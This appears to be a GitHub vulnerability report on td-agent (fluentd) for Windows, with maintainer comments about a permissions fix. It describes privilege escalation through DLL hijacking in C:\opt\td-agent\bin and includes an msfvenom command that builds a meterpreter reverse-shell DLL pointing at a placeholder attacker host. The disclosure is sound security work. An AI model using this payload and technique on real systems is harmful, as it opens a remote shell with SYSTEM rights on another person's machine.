New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Possible Vulnerability #3201
Comments
|
Yes, It seems that inappropriate permission is set. |
|
note: In constract to program files. |
|
We need to fix in wixtoolset source layer. ref. https://github.com/fluent-plugins-nursery/td-agent-builder/blob/master/td-agent/msi/source.wxs |
|
td-agent 4 fix is here: |
|
for the record, |
|
I'll close this issue when td-agent 4.1.0 is released. |
|
https://td-agent-package-browser.herokuapp.com/4/windows |
POC.docx
Describe the bug
Inappropriate folder permissions, possible escalation of privileges' on Windows
To Reproduce
Download URL:
http://packages.treasuredata.com.s3.amazonaws.com/4/windows/td-agent-4.0.1-x64.msi
Vulnerable Path:
C:\opt\td-agent\bin
Steps in reproducing the exploit:
Creating a DLL containing a reverse shell with the specific name that ruby.exe will search:
msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=IPADRRESS LPORT=PORT > CRYPTBASE.dll
Setting up MSF console to listen for connection.
Copying the DLL file that we created to “C:\opt\td-agent\bin” using a limited account:
Normally, a limited user might not have the possibility of restarting the service.
A potential attacker can wait for the service to be restarted or he can restart the machine from command line; when the service restarts, it will trigger the DLL and get NT Authority.
Expected behavior
N/A
Your Environment
Windows10
If you hit the problem with older fluentd version, try latest version first.
Your Configuration
Default
Your Error Log
No errors.
Additional context
Please add an appropriate contact method to submit possible vulnerabilities and POC's.
The text was updated successfully, but these errors were encountered: